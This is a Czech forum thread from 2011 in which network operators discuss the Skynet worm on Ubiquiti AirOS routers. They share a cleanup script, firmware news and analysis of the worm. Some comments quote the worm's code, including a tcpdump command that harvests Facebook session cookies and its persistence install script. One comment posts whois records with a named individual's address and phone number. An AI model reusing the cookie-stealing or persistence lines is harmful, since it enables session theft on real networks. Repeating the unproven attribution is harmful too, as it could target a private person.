martas (neregistrovaný) ---.klfree.cz
19. 12. 2011 16:08 Nový

nekdo od jihlavy

celé vlákno

inetnum: 178.216.144.0 - 178.216.151.255
netname: CNINET-NETWORK
descr: Pavel Scepka, CNI-NET network
country: CZ
org: ORG-CNIN1-RIPE
admin-c: PASC2-RIPE
tech-c: PASC2-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: CNINET-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: CNINET-MNT
mnt-domains: CNINET-MNT
source: RIPE #Filtered

organisation: ORG-CNIN1-RIPE
org-name: Pavel Scepka
org-type: OTHER
address: Halasova 5015/9, 586 01 Jihlava, Czech Republic
e-mail: info@cninet.cz
mnt-ref: CNINET-MNT
mnt-by: CNINET-MNT
source: RIPE #Filtered

person: Pavel Scepka
address: 5015/9, 586 01 Jihlava, Czech Republic
phone: +420776828000
nic-hdl: PASC2-RIPE
mnt-by: CNINET-MNT
source: RIPE #Filtered

route: 178.216.144.0/21
descr: CNINET
origin: AS43542
mnt-by: CNINET-MNT
mnt-by: MNT-OPTONET
source: RIPE #Filtered

inetnum: 0.0.0.0 - 255.255.255.255
netname: IANA-BLK
descr: The whole IPv4 address space
country: EU #Country is really world wide
org: ORG-TT1-TEST
admin-c: AA1-TEST
tech-c: AA2-TEST
status: ALLOCATED UNSPECIFIED
remarks: The country is really worldwide.
mnt-by: TEST-ROOT-MNT
mnt-lower: TEST-DBM-MNT
mnt-routes: TEST-DBM-MNT
remarks: This is an automatically created object.
source: TEST #Filtered

organisation: ORG-TT1-TEST
org-name: ORG TEST
org-type: RIR
address: Somewhere in nowhere
phone: +12 34 567 8900
fax-no: +12 34 567 8900
admin-c: AA1-TEST
tech-c: AA2-TEST
mnt-ref: TEST-DBM-MNT
mnt-by: TEST-ROOT-MNT
remarks: This is an automatically created object.
source: TEST #Filtered

role: TEST ROLE
nic-hdl: AA2-TEST
address: Somewhere in nowhere
phone: +12 34 567 8900
fax-no: +12 34 567 8900
abuse-mailbox: bitbucket@ripe.net
admin-c: AA1-TEST
tech-c: AA2-TEST
mnt-by: TEST-ROOT-MNT
remarks: This is an automatically created object.
source: TEST #Filtered

person: Test Person
mnt-by: TEST-ROOT-MNT
address: Somewhere in nowhere
phone: +12 34 5678900
fax-no: +12 34 5678900
nic-hdl: AA1-TEST
remarks: This is an automatically created object.
source: TEST #Filtered

Calebcz
Calebcz (neregistrovaný) 79.98.153.---
19. 12. 2011 18:55 Nový

Odvirovavaci skript

celé vlákno

Skript uvedeny v clanku mi nefunguje. Takto sem odviroval zarizeni ja:

cd /etc/persistent
rm rc.poststart
rm -rf .skynet
echo "echo 'airos.deny += (\"/admin.cgi/­.gif\")' >> /etc/lighttpd.conf" > /etc/persisten­t/rc.poststart
echo 'kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3`' >> /etc/persisten­t/rc.poststart
chmod +x /etc/persisten­t/rc.poststart
cfgmtd -w -p /etc/
reboot

U nas v siti to postihlo zarizeni na verejkach, nic nenasvedcuje tomu, ze by se vir siril dal v siti za NATem. Dnes v 12:55 se mi velke mnozstvi zavirovanych UBNT kouslo.

nemám
nemám (neregistrovaný) ---.opera-mini.net
19. 12. 2011 20:21 Nový

rychle to narvat konkurenci ať je sranda

celé vlákno

Dobrý článek, tím, že jste to podrobně rozepsali i s návodem jak to někam dostat, jste si u mě šplhli, budu sem chodit častějc....jen tak dál

imbecil
imbecil (neregistrovaný) ---.tmcz.cz
19. 12. 2011 20:35 Nový

UBNT - čínskej aušus

celé vlákno

Dobře vám tak. To máte za to že používáte levnej čínskej aušus...

Imbecil ty si AUŠUS
Imbecil ty si AUŠUS (neregistrovaný) 94.229.36.---
19. 12. 2011 20:51 Nový

Re: UBNT - čínskej aušus

celé vlákno

Autor tohoto prispevku zjavnie tiez nieje zrovna Enterprise.. Ked sa tesi z nestastia inych. Ospravedlnte ma tak ale nie ste vy EGOISTA?

Honz
Honz (neregistrovaný) ---.125.108.109.omegatech.cz
19. 12. 2011 21:01 Nový

Re: UBNT - čínskej aušus

celé vlákno

není UBNT náhodou americká firma? :)

Trident
Trident (neregistrovaný) ---.tmcz.cz
19. 12. 2011 21:23 Nový

Re: UBNT - čínskej aušus

celé vlákno

Nejsme asi tak moc entrprajs abychom si mohli dovolit Cisco z ciny;)

druhé Já pana Houby
druhé Já pana Houby (neregistrovaný) ---.tmcz.cz
20. 12. 2011 21:54 Nový

Cisco z Číny

celé vlákno

Tím Ciscem z Číny myslíte MAIPU?

Trident
Trident (neregistrovaný) ---.tmcz.cz
20. 12. 2011 23:53 Nový

Re: Cisco z Číny

celé vlákno

Ne. Tim myslim ten hardware co si necha Cisco v cine vyrabet. Takovym cinskym Ciscem je spis Huawei. Jinak cinani uz prestavaji kopirovat a zacinaji vyvijet.

Martin Stepanek
19. 12. 2011 20:56 Nový

Starší firmware imuní?

celé vlákno

Jen bych se chtěl podělit o (snad) pozitivní zkušenost, používám Nanostation NS5 se stařičkým firmware 3.3.2 (4257) z 14.2.2009. Ať dělám co dělám (virus jsem si stáhnul, rozpakoval, prošel a zkouším ručně simulovat jeho útok), na stránku admin.cfg se bez zadání hesla nedostanu. Přitom pokud zadám heslo, stránka se zobrazí a je normálně funkční.
Ten fw je standardně dostupný na oficiálních stránkách, tak pokud jsem něco nepřehlédl a nepotřebujete nutně něco co tenhle FW nemá, je to taky workaround.

magy
magy (neregistrovaný) ---.kokotko.sk
19. 12. 2011 21:31 Nový

Re: Starší firmware imuní?

celé vlákno

asi to tu nikde nie je spomenute, chyba sa vyskytuje od fw 3.6.1
(dovtedy bol ako webserver pouzity boa)

flack
flack (neregistrovaný) 94.229.36.---
20. 12. 2011 8:24 Nový

Re: Starší firmware imuní?

celé vlákno

Neviem ako prebieha vas test ja osobne som neskusal vlozit tento vir do mojho zariadenia ale len namatkovo som testoval ci existuje admin.cgi teda nie admin.cfg ako ho uvadzate vy. Z toho sa domnievam ze hladate admin.cfg ktory tam zjavne ani nikdy nebol a nebude. Alebo sa v tomto vasom pripade jedna len o preklep.

Martin Stepanek
20. 12. 2011 11:38 Nový

Re: Starší firmware imuní?

celé vlákno

To byl překlep, omlouvám se. Samozřejmě admin.cgi.

Pechy
Pechy (neregistrovaný) 213.195.224.---
19. 12. 2011 21:55 Nový

Nový firmware - 5.3.5

celé vlákno

UBNT před chvílí uvolnilo nový firmware 5.3.5 (zatím bez release note), který podle našich testů řeší bezpečnostní chybu zneužívanou virem skynet (blokuje stránku admin.cgi).

Honz
Honz (neregistrovaný) ---.125.108.109.omegatech.cz
19. 12. 2011 22:03 Nový

Re: Nový firmware - 5.3.5

celé vlákno
MilanK
MilanK (neregistrovaný) ---.din.cz
19. 12. 2011 22:40 Nový

Re: Nový firmware - 5.3.5

celé vlákno

Asi to vyřešili pořádně: neblokují pouze admin.cgi, ale i ostatní sktipty.

Brumla
Brumla (neregistrovaný) ---.klfree.cz
19. 12. 2011 22:48 Nový

Re: Nový firmware - 5.3.5

celé vlákno

Takto je to web rozhrani dost nepouzitelne nejen pro skynet, ale i pro bezneho spravce. Snad brzy vyjde 5.3.7 s trochu sofistikovanejsi opravou :-(

bLeSs
bLeSs (neregistrovaný) 78.108.102.---
20. 12. 2011 0:33 Nový

Re: Nový firmware - 5.3.5

celé vlákno

Mne se stalo asi to co tobe, kdyz jsem to nahral na ubnt bez smazaneho viru, tak webove rozhrani se zobrazovalo hodne podivne(bez obrazku a bez css). Kdyz se smaze, tak to rozhrani funguje normalne.

brumla
brumla (neregistrovaný) ---.eurotel.cz
20. 12. 2011 8:31 Nový

Re: Nový firmware - 5.3.5

celé vlákno

Restart ten problém vyřešil...

upalse@seznam.cz
upalse@seznam.cz (neregistrovaný) 2a01:490:11:----:----:----:----:----
20. 12. 2011 0:07 Nový

K cemu byl virus urcen - kradeni FB cookies!

celé vlákno

tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/persisten­t/.skynet/tt &

Jedna se o session cookie facebooku, ucelem byl nejspis fb spam/malware. Nutno poznamenat ze tcpdump se zdaleka nevyskytuje na vsech airos takze uspesnost neni uplne jista.

jas
jas (neregistrovaný) 212.71.152.---
20. 12. 2011 10:45 Nový

Re: K cemu byl virus urcen - kradeni FB cookies!

celé vlákno

Muzete to nekdo rozvest? Jedna se urcite jenom o Facebook? Pocitam tedy, ze nejde o vykradani hesel, ale jenom o moznost zneuziti aktualne otevrene session? Jinak jsem v kodu uz nic dalsiho nevidel. Zbytek je jenom mechanizmus na samosireni se.

David
David (neregistrovaný) ---.epce.cz
20. 12. 2011 9:05 Nový

šíření

celé vlákno

Ahoj. Nějak jsem nepochopil, jak se to šíří. Je to jen mezi zařízeními nebo v tom hraje i roli uzivatelovo "zavirovane" pc?

Martin Svoboda aura:43
20. 12. 2011 9:07 Nový

Re: šíření

celé vlákno

samo jenom mezi ubiquity zařízeními.

ksfj
ksfj (neregistrovaný) ---.microsoft.com
20. 12. 2011 11:09 Nový

support

celé vlákno

Jsem si rikal, ze je divne, ze vam na mail 14 dni nereagovali. Kdyz jsem jim vcera psal reakce byla velmi rychla - odepsali behem 1-2 hodin s tim ze na problemu uz pracuji ale nechteji prehnanou publicitu.

lukic
lukic (neregistrovaný) ---.mag-net.sk
20. 12. 2011 13:46 Nový

Re: support

celé vlákno

Edmuntas tvrdil, ze to spam/virus filter odfiltroval a k mailu sa nedostali.

Max
Max (neregistrovaný) 89.176.254.---
20. 12. 2011 19:55 Nový

Dotaz

celé vlákno

Dobrý den, znamená to, že se máme už tyto Vánoce připravit na nukleární apokalypsu?

Nalim27
Nalim27 (neregistrovaný) ---.vodafone.cz
21. 12. 2011 14:20 Nový

Skynet i na DLinku

celé vlákno

Dobry den,
clanek je velmi zajimavy. Mam sice doma pouze Wifi router DLink, ale radeji jsem zkusil test na virus z clanku:


Jak zjistit, že mám zavirované zařízení
zkuste se přihlásit do vašeho zařízení a zobrazit stránku http://ip.ad.re.sa/admin.cgi – pokud stránka neexistuje, máte tam Skynet

Zkusil jsem tady zadat do browseru "http://ip.ad­.re.sa/admin.cgi" a ke sve hruze jsem zjistil, ze stranka skutecne neexistuje (klasicky HTTP error 404) a tady mam dany virus na tom svem routeru!

Bohuzel postup na odstraneni viru je napsan na uplne jine zarizeni, jak mam tedy ted postupovat?
Mam cekat na novy firmware od firmy Dlink?

Ivan Stokurev
Ivan Stokurev (neregistrovaný) 212.79.108.---
21. 12. 2011 14:46 Nový

Re: Skynet i na DLinku

celé vlákno

Postupujte jednoznacne tak, ze si clanek prectete znovu a poradne :)

Tom22
Tom22 (neregistrovaný) ---.bhlnet.cz
21. 12. 2011 14:51 Nový

Re: Skynet i na DLinku

celé vlákno

Na D-LINKU to tenhle vir nebude - on je specifický pro zařízení UBNT a jen pro verze s určitou bezp.dírou, ale neklesejte na mysli, v D-LINKu bude třeba zase něco jiného ;)

BTW: je to s tím přejmenováním admin.cgi pravda? v install skriptu viru je toto:

cd /etc/persisten­t/.skynet
mv /etc/persisten­t/skynet.tgz .
mv rc.poststart /etc/persistent
ln -s /usr/www/* ./
mv admin.cgi adm.cgi
mv admina.cgi admina2.cgi
cfgmtd -w -p /etc/
reboot

tj. udělá v adresáři .skynet symlinky CGI skritů, dva z nich přejmenuje a řádek před rebootem to uloží do persistentní paměti.
Ale nejsem si jist jestli to pak nějak po rebootu ovlivní výsledné verze CGI skritů v /usr/www - nemáte v tom někdo jasno?

aaaddsadsa
aaaddsadsa (neregistrovaný) ---.net.upcbroadband.cz
21. 12. 2011 20:30 Nový

dira jako hovado

celé vlákno

Dira jako hovado, za to by zaslouzili povesit za usi!
Navic na oficialnim diskuznim foru smazali vlakno o skynetu, coz je dobre i spatne, protoze si nikdo nezkontroluje, jestli je napadnutelnej

Darkside :)
Darkside :) (neregistrovaný) ---.skvelynet.cz
28. 12. 2011 14:32 Nový

díky za download link :)

celé vlákno

co jiného dodat než .. download > modifikovat > publikovat dal :D

w
w (neregistrovaný) ---.27.broadband9.iol.cz
10. 1. 2012 22:19 Nový

Nojo, zasranej linux

celé vlákno

zlatej ♂♂

Jaroslav52
Jaroslav52 (neregistrovaný) ---.235.broadband6.iol.cz
22. 1. 2012 12:38 Nový

Upřesnění???

celé vlákno

Jak zjistit, že mám zavirované zařízení
zkuste se přihlásit do vašeho zařízení a zobrazit stránku http://ip.ad.re.sa/admin.cgi
Tím je myšleno zadat tu adresu do webováho prohlížeče?

Zasílat nově přidané příspěvky e-mailem